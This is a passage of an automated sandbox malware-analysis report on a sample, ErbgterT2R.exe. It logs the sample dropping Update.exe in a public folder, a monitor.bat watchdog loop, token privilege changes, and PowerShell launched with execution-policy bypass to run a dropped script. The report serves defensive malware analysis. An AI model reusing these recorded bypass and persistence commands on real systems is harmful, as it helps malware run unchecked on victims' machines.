                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E7620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_034E7620
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E6050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_034E6050
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile created: C:\Users\Public\BiliteJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.27
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                      Source: ErbgterT2R.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: ErbgterT2R.exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile read: C:\Users\user\Desktop\ErbgterT2R.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\ErbgterT2R.exe "C:\Users\user\Desktop\ErbgterT2R.exe"
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: update.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
